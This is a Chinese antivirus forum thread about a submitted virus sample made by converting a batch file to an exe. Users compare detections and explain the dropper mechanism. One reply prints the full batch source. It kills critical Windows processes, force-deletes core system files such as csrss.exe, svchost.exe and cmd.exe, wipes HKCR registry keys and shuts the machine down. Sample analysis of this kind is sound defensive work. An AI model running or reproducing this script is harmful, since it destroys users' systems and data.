楼主: nich
收起左侧

[病毒样本] 病毒病毒,bat转的病毒。

[复制链接]
henry217
发表于 2020-8-6 11:23:48 | 显示全部楼层
αdmin 发表于 2020-8-6 10:41
我就双击了一下看看会怎样

sfc/scannow
henry217
发表于 2020-8-6 11:25:02 | 显示全部楼层
卡巴斯基

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2020-8-6 11:48:37 | 显示全部楼层
exe  诺顿 C杀
QVM360
发表于 2020-8-6 14:46:57 | 显示全部楼层
exe属于loader,释放bat在临时目录里,这种低质量样本就别发了吧
QVM360
发表于 2020-8-6 14:47:31 | 显示全部楼层
川建国代理人 发表于 2020-8-6 10:42
转完之后运行还是这串代码啊,除了运行方式改变,并没有大改变

bat可以直接看到源码,exe不行,所以报毒名会变
WAR314159
发表于 2020-8-6 17:12:01 | 显示全部楼层
本帖最后由 WAR314159 于 2020-8-6 17:18 编辑

Win32/TrojanDropper.Delf.NXM(包名:adminbat.7z)ESET在2011-08-05已检测到
报毒名截图

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
WAR314159
发表于 2020-8-6 17:12:27 | 显示全部楼层
本帖最后由 WAR314159 于 2020-8-6 17:15 编辑
αdmin 发表于 2020-8-6 10:39
哇,我运行了删了好多东西系统出错了怎么办?

重装系统吧
@echo off
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
taskkill /f /im winlogon.exe
taskkill /f /im dwm.exe
taskkill /f /im csrss.exe
del /f %SystemRoot%\System32\csrss.exe
del /f C:\windows\explorer.exe
del /f C:\windows\System32\cmd.exe
del /f C:\windows\System32\taskmgr.exe
del /f C:\windows\System32\svchost.exe
del /f C:\windows\user\shunli
del /f \SystemRoot\System32\smss.exe
del /f C:\windows\System32\lsm.exe
del /f C:\windows\System32\dwm.exe
START reg delete HKCR/*
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /t REG_SZ /d C:\user\shunli\Desktop\admin.bat /f
shutdown /s /t 0
pipixia1234
发表于 2020-8-7 14:08:32 | 显示全部楼层

真的低质量。。。就结束进程和删文件之类的。。。镜像恢复就可以解决。。。
FleTime
发表于 2020-8-7 15:10:10 | 显示全部楼层
nich 发表于 2020-8-6 10:44
为什么exe会释放?我写bat时也没想啊???????????

bat转exe的原理,就是把bat放到exe里面,每次打开都会释放bat到缓存目录等然后运行
fgym
发表于 2020-8-7 22:08:24 | 显示全部楼层

额,这不就是暴力***吗
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 11:22 , Processed in 0.102095 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表